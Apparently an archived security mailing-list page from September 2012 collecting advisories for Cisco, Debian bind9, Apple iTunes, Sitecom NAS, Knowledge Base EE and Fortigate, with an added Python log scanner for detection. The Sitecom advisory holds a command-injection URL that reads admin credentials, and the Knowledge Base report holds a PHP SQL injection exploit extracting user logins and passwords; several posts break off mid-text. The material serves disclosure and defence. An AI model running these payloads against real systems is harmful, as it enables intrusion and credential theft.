Cisco Security Advisory: Cisco ASA-CX and Cisco PRSM Log Retention Denial of Service Vulnerability

2012-09-13 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco ASA-CX and Cisco PRSM Log Retention Denial of Service Vulnerability

Advisory ID: cisco-sa-20120912-asacx

Revision 1.0

For Public Release 2012 September 12 16:00  UTC (GMT)
+-

Summary
===

Cisco ASA-CX Context-Aware Security appliance and Cisco Prime Security
Manager (PRSM) contain a denial of service (DoS) vulnerability in
versions prior to 9.0.2-103.

Successful exploitation of this vulnerability on the Cisco ASA-CX
could cause the device to stop processing user traffic and prevent
management access to the Cisco ASA-CX. Successful exploitation of this
vulnerability on the Cisco PRSM could cause the software to become
unresponsive and unavailable.

There are no workarounds for this vulnerability, but some mitigations
are available.

Cisco has released free software updates that address this
vulnerability. 

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120912-asacx


Cisco Security Advisory: Cisco Unified Presence and Jabber Extensible Communications Platform Stream Header Denial of Service Vulnerability

2012-09-13 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Unified Presence and Jabber Extensible Communications Platform
Stream Header Denial of Service Vulnerability

Advisory ID: cisco-sa-20120912-cupxcp

Revision 1.0

For Public Release 2012 September 12 16:00  UTC (GMT)
+-

Summary
===

A denial of service (DoS) vulnerability exists in Cisco Unified
Presence and Jabber Extensible Communications Platform (Jabber XCP).
An unauthenticated, remote attacker could exploit this vulnerability
by sending a specially crafted Extensible Messaging and Presence
Protocol (XMPP) stream header to an affected server. Successful
exploitation of this vulnerability could cause the Connection Manager
process to crash.  Repeated exploitation could result in a sustained
DoS condition.

There are no workarounds available to mitigate exploitation of this
vulnerability.

Cisco has released free software updates that address this
vulnerability.  

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120912-cupxcp


Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home Storage Center

2012-09-13 Thread mattijs
Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home 
Storage Center

Severity Rating: High
Discovery Date: July 29, 2012
Vendor Notification: July 30, 2012
Disclosure Date: September 11, 2012

Vulnerability Type=
Arbitrary file upload

Impact=
Loss of system integrity

Severity=
Alcyon rates the severity of this vulnerability as high due to the following 
properties:
- Ease of exploitation;
- No authentication credentials required;
- No knowledge about individual victims required;
- No interaction with the victim required.

Products and firmware versions affected=
- Sitecom MD-253 firmware version up to and including 2.4.17
- Sitecom MD-254 firmware version up to and including 2.4.17
- Possibly other rebranded Mapower network storage products

Risk Assessment=
An attacker can upload arbitrary files to the device. By combining this with 
the command injection vulnerability described in advisory AA-008, an attacker 
can obtain a remote root shell.

Vulnerability=
The CGI executable that is responsible for handling firmware updates allows 
arbitrary files to be uploaded to the /tmp folder. Furthermore the files are 
automatically assigned execute permissions and are owned by root.

Proof of Concept Exploit= 
PoC code exploiting this and other vulnerabilities to obtain an interactive 
root shell can be found here:
  - http://www.alcyon.nl/blog/sitecom-poc-exploit

Risk Mitigation=
At the time of disclosure no updated firmware version was available.

We recommend that you limit access to the web management UI of the device by 
utilizing proper packet filtering and/or NAT on your router in order to limit 
network access to your NAS. Note that this will not completely eliminate the 
risk of exploitation, since the product is affected by other vulnerabilities 
that can be leveraged using client side attacks.

Vendor responses=
None

Fixed Versions=
There is currently no vendor patch available. A third party solution is 
available on:
- http://www.alcyon.nl/blog/sitecom-nas-md-253-and-md-254-risk-mitigation/

Latest version of this advisory=
- http://www.alcyon.nl/advisories/aa-007

References=
Security Advisory AA-008: Command Injection Vulnerability in Sitecom Home 
Storage Center
- http://www.alcyon.nl/advisories/aa-008 


Security Advisory AA-007: Command Injection Vulnerability in Sitecom Home Storage Center

2012-09-13 Thread mattijs
Security Advisory AA-007: Command Injection Vulnerability in Sitecom Home 
Storage Center

Severity Rating: High
Discovery Date: July 29, 2012
Vendor Notification: July 30, 2012
Disclosure Date: September 12, 2012

Vulnerability Type=
Command injection

Impact=
System access

Severity=
Alcyon rates the severity of this vulnerability as high due to the following 
properties:
- Ease of exploitation;
- No authentication credentials required;
- No knowledge about individual victims required;
- No interaction with the victim required.

Products and firmware versions affected=
- Sitecom MD-253 firmware version up to and including 2.4.17
- Sitecom MD-254 firmware version up to and including 2.4.17
- Possibly other rebranded Mapower network storage products

Risk Assessment=
An attacker can execute commands as the root user. This allows for the download 
and execution of arbitrary binaries and shell scripts to gain complete control 
over the device.

Vulnerability=
The installer.cgi script allows commands to be injected. A limitation exists in 
the fact that commands can only consist of characters that are not subject to 
URL-encoding. However, the hexadecimal representation of the space character 
(%20) gets converted to a space.

Proof of Concept Exploit=
Paste the following line into a browser address bar to display the device's 
admin credentials:

  
http://victimIP/cgi-bin/installer.cgi?SetExecTablecat%20/etc/sysconfig/config/webmaster.conf

PoC code exploiting this and other vulnerabilities to obtain an interactive 
root shell can be found here:
  - http://www.alcyon.nl/blog/sitecom-poc-exploit

Risk Mitigation=
At the time of disclosure no updated firmware version was available.

We recommend that you limit access to the web management UI of the device by 
utilizing proper packet filtering and/or NAT on your router in order to limit 
network access to your NAS. Note that this will not completely eliminate the 
risk of exploitation, since the product is affected by other vulnerabilities 
that can be leveraged using client side attacks.

Vendor responses=
None

Fixed Versions=
There is currently no vendor patch available. A third party solution is 
available on:
- http://www.alcyon.nl/blog/sitecom-nas-md-253-and-md-254-risk-mitigation/

Latest version of this advisory=
- http://www.alcyon.nl/advisories/aa-008

References=
Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home 
Storage Center
- http://www.alcyon.nl/advisories/aa-007
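
A detection sketch for the two Sitecom advisories above, added here as an example and not part of the original posts or of Alcyon's tooling: it scans access logs from a router or reverse proxy in front of the NAS for requests to installer.cgi that carry text after SetExecTable, or that come from outside the management network. The log format (Apache/nginx "combined"), the management subnet and the sample lines are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote

# Apache/nginx "combined" access-log prefix (assumed format).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
CGI_PATH = "/cgi-bin/installer.cgi"   # script named in the advisory
MARKER = "SetExecTable"               # query prefix shown in the advisory
MGMT_NET = ipaddress.ip_network("192.168.1.0/24")  # assumption: admin LAN

# Constructed sample lines; client addresses are documentation/private ranges.
SAMPLE_LOG = """\
198.51.100.23 - - [13/Sep/2012:10:01:02 +0000] "GET /cgi-bin/installer.cgi?SetExecTablecat%20/etc/sysconfig/config/webmaster.conf HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.168.1.20 - - [13/Sep/2012:10:02:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.1.20 - - [13/Sep/2012:10:03:44 +0000] "GET /cgi-bin/installer.cgi?SetExecTable HTTP/1.1" 200 90 "-" "Mozilla/5.0"
192.168.1.35 - - [13/Sep/2012:10:05:00 +0000] "GET /cgi-bin/installer.cgi?SetExecTablecat%20/etc/sysconfig/config/webmaster.conf HTTP/1.1" 200 312 "http://example.invalid/" "Mozilla/5.0"
203.0.113.5 - - [13/Sep/2012:10:06:30 +0000] "GET /cgi-bin/installer.cgi HTTP/1.1" 200 90 "-" "Mozilla/5.0"
""".splitlines()


def scan(lines, mgmt_net=MGMT_NET):
    """Return one finding per suspicious installer.cgi request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        path, _, query = m["target"].partition("?")
        # Normalise encoded characters and repeated slashes before matching.
        norm_path = re.sub(r"/+", "/", unquote(path)).lower()
        if not norm_path.endswith(CGI_PATH):
            continue
        reasons = []
        try:
            external = ipaddress.ip_address(m["client"]) not in mgmt_net
        except ValueError:
            external = True  # hostname or garbage: treat as untrusted
        if external:
            reasons.append("outside-mgmt-net")
        # The advisory notes %20 is turned into a space, so decode first.
        decoded = unquote(query)
        command = ""
        if decoded.startswith(MARKER):
            command = decoded[len(MARKER):].strip()
            if command:
                reasons.append("command-after-SetExecTable")
        if reasons:
            findings.append({
                "client": m["client"], "time": m["time"],
                "status": m["status"], "command": command,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["client"], ",".join(f["reasons"]), repr(f["command"]))
```

A hit from inside the management network, like the fourth sample line, is the case the advisories' mitigation note warns about: packet filtering alone does not cover requests issued by a LAN client.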


[SECURITY] [DSA 2547-1] bind9 security update

2012-09-13 Thread Florian Weimer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

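- -------------------------------------------------------------------------
Debian Security Advisory DSA-2547-1                   secur...@debian.org
http://www.debian.org/security/                            Florian Weimer
September 12, 2012                     http://www.debian.org/security/faq
- -------------------------------------------------------------------------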

Package: bind9
Vulnerability  : improper assert
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-4244

It was discovered that BIND, a DNS server, does not handle DNS records
properly which approach size limits inherent to the DNS protocol.  An
attacker could use crafted DNS records to crash the BIND server
process, leading to a denial of service.

For the stable distribution (squeeze), this problem has been fixed in
version 1:9.7.3.dfsg-1~squeeze7.

We recommend that you upgrade your bind9 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



APPLE-SA-2012-09-12-1 iTunes 10.7

2012-09-13 Thread Apple Product Security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

APPLE-SA-2012-09-12-1 iTunes 10.7

iTunes 10.7 is now available and addresses the following:

WebKit
Available for:  Windows 7, Vista, XP SP2 or later
Impact:  Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description:  Multiple memory corruption issues existed in WebKit.
These issues are addressed through improved memory handling.
CVE-ID
CVE-2011-3016 : miaubiz
CVE-2011-3021 : Arthur Gerkis
CVE-2011-3027 : miaubiz
CVE-2011-3032 : Arthur Gerkis
CVE-2011-3034 : Arthur Gerkis
CVE-2011-3035 : wushi of team509 working with iDefense VCP, Arthur
Gerkis
CVE-2011-3036 : miaubiz
CVE-2011-3037 : miaubiz
CVE-2011-3038 : miaubiz
CVE-2011-3039 : miaubiz
CVE-2011-3040 : miaubiz
CVE-2011-3041 : miaubiz
CVE-2011-3042 : miaubiz
CVE-2011-3043 : miaubiz
CVE-2011-3044 : Arthur Gerkis
CVE-2011-3050 : miaubiz
CVE-2011-3053 : miaubiz
CVE-2011-3059 : Arthur Gerkis
CVE-2011-3060 : miaubiz
CVE-2011-3064 : Atte Kettunen of OUSPG
CVE-2011-3068 : miaubiz
CVE-2011-3069 : miaubiz
CVE-2011-3071 : pa_kt working with HP's Zero Day Initiative
CVE-2011-3073 : Arthur Gerkis
CVE-2011-3074 : Slawomir Blazek
CVE-2011-3075 : miaubiz
CVE-2011-3076 : miaubiz
CVE-2011-3078 : Martin Barbella of the Google Chrome Security Team
CVE-2011-3081 : miaubiz
CVE-2011-3086 : Arthur Gerkis
CVE-2011-3089 : Skylined of the Google Chrome Security Team, miaubiz
CVE-2011-3090 : Arthur Gerkis
CVE-2011-3105 : miaubiz
CVE-2011-3913 : Arthur Gerkis
CVE-2011-3924 : Arthur Gerkis
CVE-2011-3926 : Arthur Gerkis
CVE-2011-3958 : miaubiz
CVE-2011-3966 : Aki Helin of OUSPG
CVE-2011-3968 : Arthur Gerkis
CVE-2011-3969 : Arthur Gerkis
CVE-2011-3971 : Arthur Gerkis
CVE-2012-0682 : Apple Product Security
CVE-2012-0683 : Dave Mandelin of Mozilla
CVE-2012-1520 : Martin Barbella of the Google Chrome Security Team
using AddressSanitizer, Jose A. Vazquez of spa-s3c.blogspot.com
working with iDefense VCP
CVE-2012-1521 : Skylined of the Google Chrome Security Team, Jose A.
Vazquez of spa-s3c.blogspot.com working with iDefense VCP
CVE-2012-2817 : miaubiz
CVE-2012-2818 : miaubiz
CVE-2012-2829 : miaubiz
CVE-2012-2831 : miaubiz
CVE-2012-2842 : miaubiz
CVE-2012-2843 : miaubiz
CVE-2012-3589 : Dave Mandelin of Mozilla
CVE-2012-3590 : Apple Product Security
CVE-2012-3591 : Apple Product Security
CVE-2012-3592 : Apple Product Security
CVE-2012-3593 : Apple Product Security
CVE-2012-3594 : miaubiz
CVE-2012-3595 : Martin Barbella of Google Chrome Security
CVE-2012-3596 : Skylined of the Google Chrome Security Team
CVE-2012-3597 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3598 : Apple Product Security
CVE-2012-3599 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3600 : David Levin of the Chromium development community
CVE-2012-3601 : Martin Barbella of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3602 : miaubiz
CVE-2012-3603 : Apple Product Security
CVE-2012-3604 : Skylined of the Google Chrome Security Team
CVE-2012-3605 : Cris Neckar of the Google Chrome Security team
CVE-2012-3606 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3607 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3608 : Skylined of the Google Chrome Security Team
CVE-2012-3609 : Skylined of the Google Chrome Security Team
CVE-2012-3610 : Skylined of the Google Chrome Security Team
CVE-2012-3611 : Apple Product Security
CVE-2012-3612 : Skylined of the Google Chrome Security Team
CVE-2012-3613 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3614 : Yong Li of Research In Motion, Inc.
CVE-2012-3615 : Stephen Chenney of the Chromium development community
CVE-2012-3616 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3617 : Apple Product Security
CVE-2012-3618 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3620 : Abhishek Arya of Google Chrome Security Team
CVE-2012-3621 : Skylined of the Google Chrome Security Team
CVE-2012-3622 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3623 : Skylined of the Google Chrome Security Team
CVE-2012-3624 : Skylined of the Google Chrome Security Team
CVE-2012-3625 : Skylined of Google Chrome Security Team
CVE-2012-3626 : Apple Product Security
CVE-2012-3627 : Skylined and Abhishek Arya of Google Chrome Security
team
CVE-2012-3628 : Apple Product Security
CVE-2012-3629 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3630 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3631 : Abhishek Arya of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3632 : Abhishek Arya of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3633 : Martin Barbella of Google Chrome Security Team using
AddressSanitizer
CVE-2012-3634 : Martin 

Knowledge Base EE v4.62.0 - SQL Injection Vulnerability

2012-09-13 Thread Vulnerability Lab
Title:
==
Knowledge Base EE v4.62.0 - SQL Injection Vulnerability


Date:
=
2012-09-11


References:
===
http://www.vulnerability-lab.com/get_content.php?id=702


VL-ID:
=
702


Common Vulnerability Scoring System:

8.5


Introduction:
=
Knowledge Base Software, by Novo Solutions can be used in a variety of in-house 
and external application settings.  
Our easy-to-use software is an ideal solution for small or large 
organizations who need a central 
repository to store information for Customer Support, Company Intranet, 
Employee Training, Document Management and more.

(copy from vendor website http://www.novosolutions.com/knowledge-base-software )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a critical sql 
vulnerability in the Knowledge Base Enterprise Edition v4.62.0.


Report-Timeline:

2012-09-06: Researcher Notification & Coordination
2012-09-07: Vendor Notification
2012-00-00: Vendor Response/Feedback
2012-00-00: Vendor Fix/Patch
2012-00-00: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A SQL Injection vulnerability & a misconfiguration are detected in Knowledge 
Base Enterprise Edition 4.62.0.
The vulnerability allows an attacker (remote) or local low privileged user 
account to inject/execute own sql commands 
on the affected application dbms without user interaction. The vulnerabilities 
are located in search module when processing 
to request the category variable with selcategory argument. Successful 
exploitation of the vulnerability results in MSSQL dbms 
& ASP application compromise.

Vulnerable File(s):
[+] doadvancedsearch.asp

Vulnerable Parameter(s):
[+] category

Condition  
[+] selcategory - must be not NULL


Proof of Concept:
=
The sql injection vulnerability can be exploited by remote attackers without 
user interaction and without privilege user account.
For demonstration or reproduce ...

Note:
In this report we have the Clause statement it a little bit hard to exploit it 
because of 90% non active responses with errors.
In order to exploit this vulnerability we need to use  (CAST OR CONVERT) MSSQL 
functions to obtain result of our query in Conversion Error messages.


Query:  CAST(USER_LOGIN AS NVARCHAR(4000)
Result: [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion 
failed when converting the nvarchar value 'admin' to data type int.


In the proof of concept exploit we have to change and force the query to 
retrieve users credential from user database requests.


?php
 error_reporting(0);
/*
 *  Software  Knowledge Base Enterprise Edition   4.62.00
 *  Database: MS SQL
 *  Description 
 *  Author   Kami
 *  Emailk...@vulnerability-lab.com
 *  Website  http://www.kami.ma
 *  vendor   http://www.novosolutions.com/knowledge-base-software/
 *  Exploitation-type  MSSQL error-based using .
 *  Exploitation-technique(CAST OR CONVERT) Via  (WHERE or HAVING) clause.
 */

/*  Define Target Informations  */
   
$HOST=$argv[1];  
$URI   =/doadvancedsearch.asp;

/*  DATABASE Params */

$TABLE =USERS;
$columns=array(USER_LOGIN,USER_PASSWORD); 
$evilSQL   =-6647)  UNION ALL SELECT 
CHAR(107)+CHAR(97)+CHAR(109)+CHAR(105)+CHAR(58)+CHAR(58)+MAX(ISNULL(CAST({column_name}
 AS NVARCHAR(4000)),CHAR(32)))+CHAR(58)+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(105) 
FROM USERS where USER_ID=1 --  ;

 

 $Exploit= new Exploitcore();

 
  if($argc  1) {
  echo \n.'[+] Exploitation Start
  
  \\\
.--.  /// 
(:::)(_)():-
`--°  \\\
  Exploit sent///
  
'.\n;

 if(isset($argv[2]))
 $URI=$argv[2].$URI;
 echo  [+] URL : .$argv[1].$argv[2].\n;
 $n=1;
foreach($columns as $column){
 
$evilSQL   =-6647)  UNION ALL SELECT 
CHAR(107)+CHAR(97)+CHAR(109)+CHAR(105)+CHAR(58)+CHAR(58)+MAX(ISNULL(CAST({column_name}
 AS NVARCHAR(4000)),CHAR(32)))+CHAR(58)+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(105) 
FROM USERS where USER_ID=1 --  ;

$evilSQL=str_replace({column_name},$column,$evilSQL);

$Payload=array(
advsearchwords=sds,
selcategory=19,
category=$evilSQL,
operation=%2B,
limit=25,
searchtype=1,
enableExclude=1,
enableInclude=1,
daterange=0,
  

Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities

2012-09-13 Thread Vulnerability Lab
Title:
==
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities


Date:
=
2012-09-06


References:
===
http://www.vulnerability-lab.com/get_content.php?id=557


VL-ID:
=
557


Common Vulnerability Scoring System:

5


Introduction:
=
The FortiGate series of multi-threat security systems detect and eliminate the 
most damaging, content-based threats from email 
and Web traffic such as viruses, worms, intrusions, inappropriate Web content 
and more in real time - without degrading 
network performance.

Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 
series for large enterprises, service providers and 
carriers, the FortiGate line combines the FortiOS™ security operating system 
with FortiASIC processors and other hardware to provide 
a comprehensive and high-performance array of security and networking functions 
including:

* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options

FortiGate appliances provide cost-effective, comprehensive protection against 
network, content, and application-level threats - including 
complex attacks favored by cybercriminals - without degrading network 
availability and uptime. FortiGate platforms incorporate sophisticated 
networking features, such as high availability (active/active, active/passive) 
for maximum network uptime, and virtual domain (VDOM) 
capabilities to separate various networks requiring different security policies.

Since 2009 Fortigate appliance series got certified by the U.S. Army and is now 
listed in the 
Information Assurance Approved Products List (IA APL). The military provides 
high security 
standards to secure outdoor camps, air base, offices with fortigate hardware.

(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate )


Abstract:
=
Vulnerability-Lab Research Team discovered multiple persistent Web 
Vulnerabilities in the FortiGate UTM Appliance Application.


Report-Timeline:

2012-05-06: Researcher Notification & Coordination
2012-05-10: Vendor Notification
2012-06-11: Vendor Response/Feedback
2012-08-25: Vendor Fix/Patch ( Fixed in FortiOS v4.3.8 B0537 & Fixed in 
FortiOS v5.0 )
2012-09-06: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Fortigate
Product: UTM Appliance Application vFortiGate-5000 Series;FortiGate-3950 
Series;FortiGate-3810A;


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple input validation vulnerabilities (persistent) are detected in the 
FortiGate UTM Appliance Application. Remote attackers 
& low privileged user accounts can inject (persistent) own malicious script 
code to manipulate specific customer/admin requests. 
The vulnerability allows a local low privileged attacker to manipulate the 
appliance (application) via persistent script code 
inject. The vulnerability is located in the Add or Tags module category listing 
with the bound vulnerable applied tags & tags display parameters.
Successful exploitation results in content module request manipulation, 
execution of persistent malicious script code, session 
hijacking, account steal & persistent phishing.

Vulnerable Module(s): (Persistent)
[+] Tags - Applied tags 
[+] Add - Tags Display


Interface - UTM WAF Web Application [Appliance]
FortiGate-5000 Series;FortiGate-3950 
Series;FortiGate-3810A;FortiGate-3600A;FortiGate-3016B;FortiGate-1240B
FortiGate-800;FortiGate-620B;FortiGate-311B;FortiGate-310B;FortiGate-300A;FortiGate-224B;FortiGate-200B
 Series


Proof of Concept:
=
The persistent vulnerabilities can be exploited by remote attackers with low 
required user interaction or low 
privileged user account. For demonstration or reproduce ...


Code Review:Tags - Applied tags [Box]  Listing
URL:
http://appliance.127.0.0.1:1337/firewall/policy/policy6?expanded=#

name=``addr_dlg`` action=``/firewall/address/add`` onsubmit=``if 
(!fwad_form_check('Please choose one address/group.',
'Please choose one interface to connect.')) return false; if 
(document.forms[0].submitFlag) return false; document.forms[0].
submitFlag = true;``
tabletbodytr
td align=``left`` width=``150``nobrAddress Name/nobr/td
td align=``left``input 
name=``name`` size=``64`` maxlength=``63`` value=``all`` type=``text``
/td
/tr
tr
tdColor/td
tdspan colorclassprefix=``addr_ipv6_
`` class=``icon_fw addr_ipv6_13`` id=``addressIcon``/span a href=``#`` 
id=``addressColor`` cscolorvalue=``0``[Change]input value=``13`` 
name=``csColor1``